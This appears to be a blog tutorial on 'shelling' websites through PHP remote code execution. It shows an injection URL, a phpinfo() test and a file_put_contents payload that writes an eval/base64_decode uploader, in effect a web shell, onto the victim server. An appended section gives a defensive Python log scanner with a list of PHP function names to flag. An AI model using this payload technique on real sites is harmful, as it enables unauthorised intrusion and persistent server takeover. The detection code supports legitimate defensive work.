How to Shell Website With RCE Remote Code Execution


[RCE] REMOTE CODE EXECUTION TUTORIAL


How to Find an RCE Vulnerability?

RCE most commonly happens via unsanitized input on a website.

What Can We Do With This Vulnerability?


We can execute any PHP code. Normally PHP code must start with <?php and end with ?>, but because the injected input already lands inside PHP code, we insert only the code itself, such as phpinfo();

Injection Point?


For example, you find a site with a URL like this:
http://mysite.com/includes/functions.php?products=

So the parameter "products" is where we are going to inject our malicious code!

To test the site, the URL becomes something like this:
http://mysite.com/includes/functions.php?products=phpinfo();


How to Shell the Site With RCE (Remote Code Execution)?
So if the code "phpinfo()" got executed, it means, boom, the site is vulnerable to attack.
Now let's shell the site with some PHP built-in functions.

We will use this function to shell the site: file_put_contents
and this script, coded by me! Get the script over here!

Now let's execute our malicious code:

http://mysite.com/includes/functions.php?products=file_put_contents('uploader.php', '<?php /* UPLOADER SCRIPT BY MKAY */ ?>
<?php eval('?>' . base64_decode('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'));');


Boom, our uploading script got uploaded! :D
Now the script will be uploaded to http://mysite.com/includes/

Now just type "uploader.php" after the path where it has been uploaded.

For example: http://mysite.com/includes/uploader.php
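
From the defender's side, the requests described above leave a recognisable trace in the web server's access log. The following is an added example, not part of the original post: it scans combined-format log lines for query-string values that contain PHP function calls such as phpinfo() or file_put_contents(. The log lines, the function list and all names in the code are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Assumption: this function list is illustrative, not exhaustive.
PHP_CALLS = ("phpinfo", "file_put_contents", "eval", "base64_decode",
             "system", "exec", "shell_exec", "passthru", "assert")
CALL_RE = re.compile(r"\b(" + "|".join(PHP_CALLS) + r")\s*\(", re.IGNORECASE)
# Combined log format: ip - user [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def decode_repeatedly(value, rounds=3):
    """Undo nested URL-encoding (%2528 -> %28 -> '(') used to evade filters."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(log_lines):
    """Return one finding per parameter whose value contains a PHP call."""
    findings = []
    for line in log_lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, _ts, _method, target, status = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hit = CALL_RE.search(decode_repeatedly(value))
            if hit:
                findings.append({"ip": ip, "path": parts.path, "param": name,
                                 "call": hit.group(1).lower(), "status": int(status)})
    return findings

# Constructed sample log lines (documentation IP ranges, payload body elided).
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /includes/functions.php?products=12 HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /includes/functions.php?products=phpinfo(); HTTP/1.1" 200 80211 "-" "-"',
    '203.0.113.9 - - [10/Oct/2023:13:56:40 +0000] "GET /includes/functions.php?products=file_put_contents%28%27uploader.php%27%2C%27...%27%29 HTTP/1.1" 200 0 "-" "-"',
    '203.0.113.9 - - [10/Oct/2023:13:57:02 +0000] "GET /search?q=how+to+evaluate+risk HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 response to a request flagged this way is the signal to check the target directory for newly created .php files and to review how the parameter reaches the PHP interpreter.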









Mikail Khan

Hi. I’m Mikail Khan (Mkay), first a PHP and MySQL programmer and developer, and then a young tech blogger from Pakistan who loves to read and write blogs. Feel free to ask in case you have any query regarding computers; contact me here!
